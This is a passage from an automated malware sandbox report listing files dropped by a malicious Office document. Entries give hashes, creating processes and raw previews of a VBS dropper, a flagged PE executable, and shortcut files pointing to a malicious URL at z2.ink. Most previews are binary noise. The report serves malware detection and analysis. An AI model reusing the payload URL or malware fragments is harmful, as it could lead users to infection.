Preview:	{\rt.........{\\fontinfo250569160 \"}.{\398519213&]/3..`+56??^?2)4/_~6!,?_&1/&6]=..9:3]8/\|.<`&.:#(.41._+7%352\|1)4?4^_@.<~..`%@2/%?4+&6%9..??~2:?0?!33.$0`!88]?30.!??<[?%$($<?3,?/.%!/425?0%)9-%@/11~??60%148.-9$?#?4.^0-6]72?9@317$\|[3-):3?`57..!.&<-..8/@15]_\|-+.88?3$?;5?/-,0)`,.+@1!!<&&3%((21~6%:7?-??(.#!.5_$./$&$).>~%(+;?(\|./`'0)6~`'%3`.,%#==.'[?.!?50:%$,\|$.=&`??%..8)532%9^~^?#?64:3\|-.^%#71...7$?_??@)9?=181$.<;$/7,?-%28]=.~0408!][/8?22)[?;)\|-).1_+4.@`(+?+#>=]:.%4+0!!$6;?3)1+?&)2)2][.#:13?<1?0$?+79/%.8''~.1!>@-\|^.&3':??~?0?).9@1#.&(~68(@05;;:4~?^@#)'5][)#,6./'@[\|6.)!%,_>:@..~%,$`?%\|(.2@3:%414^%^./#>!.%`$&_:9!#+;?',63'?`&?-.:>_<?+='?2=59:[%0...?\|[/.47?+,(%`).1.9.97'),_@?_%_$/?+>,]7]+=7/.?#:[.07;1^2]2[.46#.%;8?0`?/??(,?]7]?\|6<;%;<-~].&.$%0')^+.;24[+.[;53/@8_?\|?5_?4%_).92~@-3,'!.9).57?>-^@1+5<][6<.!&.22?2_16/1\|>^;%;%@8.#&:4??(25(?5)!'7%?75;=-//(3?&)6_1'[)3^;.~$>93!+.-!?'17?_/*?8..1???(%+??\|><,81@61<~!?./']~^7485>$().-?<4^..)3:.2..)&48/)?>;.,!)7''?.']6.94;+!-??9$(.9?.\|.11

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5C434091.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	21672
Entropy (8bit):	3.11132160672872
Encrypted:	false
SSDEEP:	192:LaBrHLbyRlivQV8+9/wjUbLNU9PPPN26cHmyopJ0HTrtA6qLT8+j:uLbMlV8+9LU9PPPc6cHmqHXtA6qLjj
MD5:	6C130E74F6F9F8674A275A549DB8759C
SHA1:	7855A1008E5490F75855CCA71AC0B2A75D66AA64
SHA-256:	4E92135B3F7D4E62E40D869635DFB20BDE36AA35FDED539E7AA3A358E9E23B0B
SHA-512:	DF217162D1666E22372F1B43DF503EEA2B1D0BCC7EBA0020DDA60D205A99A9C4B5AF079A2A518B324A5D5C16F9EF8A33398A999B0772F8D7BA8AFF4E99925F1D
Malicious:	false
Preview:	....l...........7...............~@...&.. EMF.....T..+.......................j.......................{.......F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................<.......%...........%...........R...p................................@. C.a.l.i.b.r.i..........................................................................................2%.........d.........x.0.......0.....................x.0.....x.0.......0.....7......................@................C.a.l.i.b.r.i.......................................................................................dv......%...........%.......................R...p................................@."C.a.l.i.b.r.i........................................................................................./.S.............0.......0.......0.......................0.......0.......0.....7......................@.N..............C.a.l.i.b.r.i...........

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\61AE6F44.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	628172
Entropy (8bit):	1.8784458080296922
Encrypted:	false
SSDEEP:	1536:X55BmEIRbhu5KBriOBDn/fKcfu50y7eMGn5v1IN6zJ8Tqbb0z88eqliq0:GnZu50yknG/qc+p
MD5:	33CD802D79D3EBA6B4492A32E2435249
SHA1:	ED27F46A081A8D0131B7AF82B0655981CE314BD4
SHA-256:	DCCD8DCB2FDD54E3C52CB13D76BB66D05056571992D1C8434FFDE460F7135732
SHA-512:	2B44D686E640CF71E23C2BB5274BF1E2A523FE23411D0DDA4B2A1198A4AA4BCC9E2DD65A73EF3F4178B1C0E2DBDDF4007ECC9DB87021DF3A29FC39A9666FDB8E
Malicious:	false
Preview:	....l................................5.. EMF...............................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...............N........... ...O...!..............?...........?................................'................ `.....%...........(.................... `.L...d...............N...........~...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7BF22ED0.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	628172
Entropy (8bit):	1.8784458080296922
Encrypted:	false
SSDEEP:	1536:X55BmEIRbhu5KBriOBDn/fKcfu50y7eMGn5v1IN6zJ8Tqbb0z88eqliq0:GnZu50yknG/qc+p
MD5:	33CD802D79D3EBA6B4492A32E2435249
SHA1:	ED27F46A081A8D0131B7AF82B0655981CE314BD4
SHA-256:	DCCD8DCB2FDD54E3C52CB13D76BB66D05056571992D1C8434FFDE460F7135732
SHA-512:	2B44D686E640CF71E23C2BB5274BF1E2A523FE23411D0DDA4B2A1198A4AA4BCC9E2DD65A73EF3F4178B1C0E2DBDDF4007ECC9DB87021DF3A29FC39A9666FDB8E
Malicious:	false
Preview:	....l................................5.. EMF...............................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...............N........... ...O...!..............?...........?................................'................ `.....%...........(.................... `.L...d...............N...........~...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{D9BCE685-2557-45B4-B3BC-EEF401A63014}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	2.691504265284613
Encrypted:	false
SSDEEP:	96:mpMPQIX4/EG7v8RPLNkWRMPdIu42EG7v8RPLNkW:PPyEk0lN8P1Ek0lN
MD5:	6453E0BB417A0C8735812966FB60ED78
SHA1:	57DAE418543975AC0D6C43A28137529CF24162CA
SHA-256:	E01470CEA2998FFBE086A3F248D899D27042D7F2AA8510FB66BC74E0357FE51A
SHA-512:	B2B3D9766D9C188EC91B7127C3AA7E7EB628BAAE22BB1A64E5C034BA9E40552FCE771E04C92A6E3BBECEC1B851D9405C7A61C3A76B5841BE3B0554647F633CFE
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{2D2A1F64-27D8-4507-A763-F5114DB22C88}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F791DA79-78F1-4AE5-808F-463F6AF8FA08}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	3.3531927086898494
Encrypted:	false
SSDEEP:	96:vHH8TdZ6Q2+xEt6NrUTvxuKatCqfaWb/ex4AIRMatTuA:vH6dZ6Qut+rUzk5UgVy4AIma9Z
MD5:	EACE236DCD0F66AA1498E6356C7AE8B2
SHA1:	696E88BF7DACF5444C0FD2127ECA9A1CAA65901B
SHA-256:	79A15B0CE54AD40B9F3A5C05225515972A6BCAD25B6F55E2AEEE9AD4CF37305E
SHA-512:	D953E57FD3852D78DD8FF53CA17AA911E331D661716E98F41D12FCBF520F875311D49B11AB17FB705258AC270B7DF5900FBC19E1298CC2572D64F4BA373CEE3B
Malicious:	false
Preview:	................9.8.5.1.9.2.1.3.&.]./.3.....`.+.5.6.?.?.^.?.2.).4./._.~.6.!.,.?._.&.1./.&.6.].=.....9.:.3.].8../.\|...<.`.&...:.#.(...4.1..._.+.7.%.3.5.2.\|.1.).4.?.4.^._.@...<.~.....`..%.@.2./.%.?.4.+.&.6.%.9.....?.?.~.2.:.?.0.?.!..3.3...$.0.`.!.8.8.].?.3.0...!.?.?.<.[.?.%.$.(.$.<.?.3.,.?./...%.!./.4.2.5.?.0.%.).9.-.%.@./.1.1.~.?.?.6.0.%.1.4..8...-.9.$.?.#.?.4...^.0.-.6.].7.2.?.9.@.3.1.7..$.\|.[.3.-.).:.3.?.`.5.7.....!...&.<.-.....8./.@.1.5.]._.\|.-.+...8.8.?.3.$.?.;.5.?./.-.,.0.).`..,...+.@.1.!.!.<.&.&.3.%.(.(.2.1.~.6.%.:.7.?.-.?.?.(...#.!...5._.$.../.$.&.$.)...>.~.%.(.+.;.?.(.\|.../.`.'.0.).6.~.`.'.%.3..`...,.%.#.=.=...'.[.?...!.?.5.0.:.%.$.,.\|.$...=.&.`.?.?.%.....8.).5.3.2.%.9.^.~.^..?.#.?.6.4.:.3.\|.-...^.%.#.7.1.......7.$.?._.?.?.@.).9.?.=.1.8.1.$...<..;.$./.7.,.?.-.%.2.8.].=...~.0.4.0.8.!.].[./.8.?.2.2.).[.?.;.).\|.-.)...1.._.+.4...@.`.(.+.?.+.#.>.=.].:...%.4.+.0.!.!.$.*.6.;.?.3.).1.+.?.&.).2.).2.].[...#.:.1.3.?.<.1.?.0.$.?.+.7.9./.%...8.'.'.~...1.!.>.@.-.\|.^...&.3.'.:.?.?.~.

C:\Users\user\AppData\Local\Temp\1ws4m3m4.xs5.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\2kro4ew5.lct.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\BC5.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	SQLite 3.x database, last written using SQLite version 3008001, file counter 24, database pages 5, cookie 0xf, schema 4, UTF-8, version-valid-for 24
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.3870145383915669
Encrypted:	false
SSDEEP:	48:TBLOpEO5J/Kd7UEvqckQaKgj5EZwx1wayEgd7kKK9LeYyBlIAO/tXK:hNw0CKaKfu1wai6LeYzN/9K
MD5:	1623709C6B2FB813984B1265C26A85F1
SHA1:	CCE4DDBE93E97E68359CB6FD71242F796A785F86
SHA-256:	88BCF762A75F085ECD3B12EB2BA81B81A7F8C9CDDDD4DED624BA28566EB7EEAA
SHA-512:	6D2E23E4E0D1D912AF3426129F7DE490F23326F6179EEC27AFE28C438CA37493AEA775E62755C76D6A8850DB6D6E70F0D0A8D396A35E869F4BF0F761CDD507D8
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................-........#..k...#.<....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\F8D.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
Category:	dropped
Size (bytes):	77824
Entropy (8bit):	1.133993246026424
Encrypted:	false
SSDEEP:	96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
MD5:	8BB4851AE9495C7F93B4D8A6566E64DB
SHA1:	B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
SHA-256:	143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
SHA-512:	DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
Malicious:	false
Preview:	SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\FF56.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 3, database pages 20, cookie 0x15, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.7798653713156546
Encrypted:	false
SSDEEP:	48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u
MD5:	CD5ACB5FAA79EEB4CDB481C6939EEC15
SHA1:	527F3091889C553B87B6BC0180E903E2931CCCFE
SHA-256:	D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96
SHA-512:	A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\mfe1q2ow.ix3.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\tmn44ujy.e4g.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\{2178790F-B770-41BF-8744-4B796E955306}

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.025246492481374738
Encrypted:	false
SSDEEP:	6:I3DPcfy/7u1HvxggLR5kS1AZoFRXv//4tfnRujlw//+GtluJ/eRuj:I3DPjuRf/vYg3J/
MD5:	C15C83C5778720A2D10B25F1C6201622
SHA1:	01DEED5673CFF4E446E8D88EEB46AFE8620688C2
SHA-256:	4C66CD17E00341199BCF6E5164D37069C18ED3FAE49EB46AB1C12B61B9C3D526
SHA-512:	35CE37315234C755CDD9891D463C95DDCF825E351BAFEF0F0F7B67C918A54C14B474D303BFA58C50DF6ED69608448D0E517AD4980752577E20A264DF9EC20333
Malicious:	false
Preview:	......M.eFy...z.^.9..EE....._,S,...X.F...Fa.q............................G.]z).YK.6O...............8.i+]C....#9.y.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{B33A6DEA-0735-487B-B176-36E55809ABF7}

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.025481530230235333
Encrypted:	false
SSDEEP:	6:I3DPcJUYE1xNHvxggLR8jqtqZz3RXv//4tfnRujlw//+GtluJ/eRuj:I3DPYUY+Z8qsZ1vYg3J/
MD5:	912E2E67E9404F25DC1024C18FFBDEC8
SHA1:	013A9A7BAD22A08482C41226DD34DCA46B258E39
SHA-256:	EEEC61CEA49D1E982C9117C5F1D8D59F978B9DDEB6E0EBC6292393FEE759E898
SHA-512:	7056966A65551026A7005E0E7B8A6EA625A3CA179AB9DFDE0867F689C655EC6BFBBF082957CB2B959F269B59F8877290A1E7DFD760B9DD7E87818A68AB1C07D2
Malicious:	false
Preview:	......M.eFy...zNq..<.@F... ).`.S,...X.F...Fa.q.............................s. a.-I.AJ%M...........E...3l.M..dX..Y.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF2D116EC66936C416.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFBC2F112CC991C446.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.7558479785468107
Encrypted:	false
SSDEEP:	48:7Xp6n4CH+wzlJVixkweC9Cd1kmpUFUoibk8:7Xp64CH+wPae5MUX
MD5:	366AEF6F8B626168888E766D0247D7F6
SHA1:	937B7B5B031DE07FD3A58655CD6D296EB3834586
SHA-256:	2A9C79805C0B62A9082B522295285FCEBD6FB8EB779E3ACFFC7251BB29351334
SHA-512:	907FC5517CD44B9C2015095992A149B57E73D5041F502940BF9FA8B0455CD3C814F5CE5AB115D204885EA8A5156A469543EEA95B240571E7809FE5D5BA8DE175
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFF92B5CC893CED70F.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Generic INItialization configuration [xls]
Category:	modified
Size (bytes):	60
Entropy (8bit):	4.450489295854282
Encrypted:	false
SSDEEP:	3:bDDW94LZX/UYCmMTBCv:b/3ZX+T2
MD5:	E3B1660C44C00D2A5E0486F2810413C4
SHA1:	7F949B38D62E2FAFF1B4805D4B26C39B99C002F7
SHA-256:	A54193170A53453913B48619DC8EBB9A416666C73A54547697EF4372B50773C5
SHA-512:	97861D50200935609E62A91502DF367D4C4DDABE557B31FDADE8E2D433F503E621F882E378A23896021EBFE2AF9478A0C374DEB14470DE2C70EF7DFC2E742351
Malicious:	false
Preview:	[folders]..nXPJ.url=0..z2.ink.url=0...LNK=0..[xls]...LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\nXPJ.url

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows 95 Internet shortcut text (URL=<http://z2.ink/nXPJ>), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	44
Entropy (8bit):	4.589780198035243
Encrypted:	false
SSDEEP:	3:HRAbABGQYm/5XGY:HRYFVm/5XZ
MD5:	2FD56CC67805992F9FD505683625003E
SHA1:	0476249A068212B59827BDE7EBB955EEA6C6880C
SHA-256:	2EA6B0B4D8D0CF806F32E889E4FEA747E017917FE8AF1368F93EA730422D0094
SHA-512:	4B9875380A5F2EEAC0AC3D3FE9C5BA97CF1ACB4E7E8E61F3531DF57E02B57AC122098C3255D8B56C33C7E93F5637284BECB25ABA35386D85F0252235AF006B80
Malicious:	true
Preview:	[InternetShortcut]..URL=http://z2.ink/nXPJ..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\z2.ink.url

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows 95 Internet shortcut text (URL=<http://z2.ink/>), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.446439344671015
Encrypted:	false
SSDEEP:	3:HRAbABGQYm/5XG8n:HRYFVm/5XJn
MD5:	7F1FACEA6A36B544AC585A5173C32BBC
SHA1:	2B9A9BA3C87CEF7C19ED56EEBA30731D250D4726
SHA-256:	2A4741F9C5EDC7138E16555F591135B3258319D3DFF94D7864AF06AB73E66262
SHA-512:	16E1F8B87EF5D39867FF4B82D4F472EA059680C3344FFEF3F033F6410F9FA0D6626FB16E43DC041AB56606EBEFFC444D3CCC088581C18038DC32A9BC7318E41A
Malicious:	true
Preview:	[InternetShortcut]..URL=http://z2.ink/..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.503835550707525
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVywgmbVWtUykLC+ln:vdsCkWt3gmoUyd+l
MD5:	B37CE9E8345F9558D8E3AFB62D07B0DF
SHA1:	99057A85C270AC5FACCB9F49E1FEA3E73B1BC5BD
SHA-256:	B0542FB818F2CBEA824C83BE01289ED036D9BDF164970A75B018F43E26547FA4
SHA-512:	88C7BEFCBB413DA42095ADFFF91AA82350181FF6162718D0A98B4A2E6D472499B3647C3E33A119326A134AA96D9D97984E73695F1D4C59F29F06484E2CAC325F
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

C:\Users\user\AppData\Roaming\lionarekingofjungleimageshe.vbs

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	158312
Entropy (8bit):	3.2731864151473893
Encrypted:	false
SSDEEP:	1536:Igwd99COby6Cyc12taJK6d9gjh8W0/5JpXe1cNUg0B0bUZlu9gISsR5:XwdPUJK6L/Kcig0B0ci
MD5:	5CFD67486E857744CCC14E2DEF9FF318
SHA1:	4049E46FE68A2B97F3F6C7170A7FB859D097F88E
SHA-256:	D14DB1AEC62AA5C55D3E507CF9502A6D2E26C9F1C3FB55FE9649FF8576AF02B3
SHA-512:	6EC2A3C304A84468A2FF4CD26A4B74C05FA212794A5E7BDCFB538A35CBD560075541097450689833841CFC5D01020C1AB762F20D855E416033CCFFAF7E62E6EF
Malicious:	true
Preview:	......F.u.n.c.t.i.o.n. .W.M.I.D.a.t.e.S.t.r.i.n.g.T.o.D.a.t.e.(.d.t.m.E.v.e.n.t.D.a.t.e.).........W.M.I.D.a.t.e.S.t.r.i.n.g.T.o.D.a.t.e. .=. .C.D.a.t.e.(.M.i.d.(.d.t.m.E.v.e.n.t.D.a.t.e.,. .5.,. .2.). .&. ."./.". .&. ._.....M.i.d.(.d.t.m.E.v.e.n.t.D.a.t.e.,. .7.,. .2.). .&. ."./.". .&. .L.e.f.t.(.d.t.m.E.v.e.n.t.D.a.t.e.,. .4.). ._.....&. .". .". .&. .M.i.d. .(.d.t.m.E.v.e.n.t.D.a.t.e.,. .9.,. .2.). .&. .".:.". .&. ._.....M.i.d.(.d.t.m.E.v.e.n.t.D.a.t.e.,. .1.1.,. .2.). .&. .".:.". .&. .M.i.d.(.d.t.m.E.v.e.n.t.D.a.t.e.,. ._.....1.3.,. .2.).).........E.n.d. .F.u.n.c.t.i.o.n.....'././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.....'././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.....F.u.n.c.t.i.o.n. .g.e.t.D.e.s.c.r.i.p.t.i.o.n.(.s.t.

C:\Users\user\AppData\Roaming\rugtucw

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	64704
Entropy (8bit):	6.02370063609959
Encrypted:	false
SSDEEP:	768:f8XcJiMjm2ieHlPyCsSuJbn8dBhFRHSMM6Iq8HSYDKJENf+i6CBpTX:TYMaNylPYSAb8dBnhHr4DKKNf+GBp
MD5:	8FE9545E9F72E460723F484C304314AD
SHA1:	3718A40FFC3AF2613B8B5FE41C475D85FF0522F4
SHA-256:	D2F0B87E2D2707685C4D35F8F05B42FB8326EF4E70D16097B8837DABA06AC961
SHA-512:	0738526EB2E6C485528C6B5A8DDABB51F095C134E010F9F3F25F341ABBE7A63072B0E2C2B161713D28B93F2A33C1476A0FED2D64FF86C9547DA9AF34DC90529A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: Requirements.xla.xlsx, Detection: malicious, Browse Filename: vns.exe, Detection: malicious, Browse Filename: Doc606112.xls, Detection: malicious, Browse Filename: SWIFT26794306.xlam.xlsx, Detection: malicious, Browse Filename: Enquiry#234342.xlam.xlsx, Detection: malicious, Browse Filename: Profoma.xls, Detection: malicious, Browse Filename: Scan_doc000680092112202023130.xlam.xlsx, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.RansomX-gen.23647.22068.exe, Detection: malicious, Browse Filename: e-Profile.js, Detection: malicious, Browse Filename: Orden_581278118.xlam.xlsx, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...pn.\..............0.............^.... ........@.. ....................... ............`.....................................O.......8................>........................................................... ............... ..H............text...d.... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B................@.......H........A...p..........T................................................~P...-.r...p.....(....(....s.....P.....0.."........(......-.r...p.rI..p(....s....z....0..........(....~P.....o........(....n(.....(..........%...(....~(.....(..........%...%...(.....(.....(..........%...%...%...(....V.(......}Q.....}R.....{Q.....{R......0...........(.......i.=...}S......i.@...}T......i.@...}U.....+m...(....o .....r]..p.o!...,..{T.......{U........o"....+(.ra..p.o!...,..{T.......

C:\Users\user\AppData\Roaming\sfwjhij

